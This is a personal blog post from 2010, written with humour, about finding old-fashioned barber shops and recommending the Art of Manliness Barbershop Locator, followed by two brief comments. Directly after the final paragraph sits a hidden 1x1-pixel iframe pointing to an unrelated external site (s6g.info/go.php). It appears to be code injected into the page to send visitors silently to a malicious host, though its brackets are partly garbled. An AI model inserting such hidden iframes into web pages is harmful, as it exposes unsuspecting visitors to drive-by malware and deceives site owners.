Posted by: wrmcnutt | February 12, 2010

Barbarshop Locator


I wish to bring your attention to an endangered species, vital to both the international economy AND to the survival of our ecosystem.  I refer, of course, to the barber and his natural habitat, the barber shop.  When I left South Carolina to emigrate to Tennessee for educational purposes, I had, like most men, a long and well established relationship, if not with my barber, at least with my barber shop.  I could count on, in return for my patronage, a selection of slightly out-of-date hunting, fishing, and firearms related magazines, and a haircut that not only got me back out of there in a half-hour, but didn’t make me look like a metro-sexual.

When I first arrived in Knoxville, I was appalled at how difficult it was for me to find a barber.  Oh, sure, the city’s got plenty of stylists who work in perfectly serviceable salons. But these individuals require very close monitoring, or you end up with a high maintenance hairdo that looks like something out of GQ magazine, or worse.  Here’s the rule:  if you have to make an appointment, he’s not a barber, he’s a stylist.  I want to be able to go to the haircut store, sit on the plastic and metal chairs, wait my turn, get a haircut, and leave, all within 45 minutes.  There’s should be slightly out-of-date magazines, and maybe a small black-and-white TV set on the fishing channel.  It should smell of Barbicide(tm), and be neatly swept, but with little bits of mixed hair in the corners where it’s hard to reach.

And they’re out there.  Lonely, heroic pioneers, doing hero’s work.  Cutting men’s hair in a manly fashion, and without an appointment.  They can be found in big cities, small towns, and occasionally, on the odd oil rig.  But when you’re a stranger in a strange town, how do you find them.  For a sure as God makes little green apples, sooner or later, you’re going to need a haircut while traveling.  And as all men know, “you might look like Larry, Moe, or Curly if a stranger cuts your hair.”

In my travels about the world wide web, I have discovered the Art of Manliness Barbershop Locator. This is a Web 2.0 user-driven project.  The idea is that everybody logs in and locates good barbershops.  So, please, no salons, or barber shops that suck.    I’ve already cleaned up the database.  I’ve removed any barber shops that had no names, no addresses, or got dropped in the middle of the ocean or in the middle of Antarctica.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. And you openly support such barberism?

    • What can I say, I am who I am.


Leave a Reply

Categories

